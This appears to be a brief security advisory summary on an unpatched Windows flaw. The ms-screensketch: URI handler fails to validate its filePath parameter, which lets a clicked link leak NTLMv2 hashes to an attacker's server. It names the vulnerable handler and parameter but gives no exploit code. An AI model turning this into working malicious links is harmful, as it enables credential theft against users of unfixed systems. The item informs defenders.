Unpatched NTLM Vulnerability in Windows URI Handlers Exposes Credentials

A newly identified flaw in Windows URI handlers can leak NTLMv2 hashes to attacker-controlled servers with a single link click. This vulnerability is related to CVE-2026-33829, which was patched in the Windows Snipping Tool on April 14, 2026, but no CVE has been assigned for this variant. The issue arises from the ms-screensketch: URI handler, which does not validate the filePath parameter, allowing NTLM authentication to be triggered and exposing sensitive credentials. Attackers can exploit this flaw without requiring malware, merely by tricking users into clicking a link. The vulnerability affects Windows systems running the Snipping Tool and similar URI handlers. As of now, Microsoft has not provided a fix or acknowledged the new variant. Security professionals are urged to remain vigilant as this could facilitate unauthorized access to networks.

Key Points: • A new NTLM vulnerability allows credential leakage via Windows URI handlers. • The flaw is similar to CVE-2026-33829 but lacks a CVE and fix. • Exploitation requires only a user to click a specially crafted link.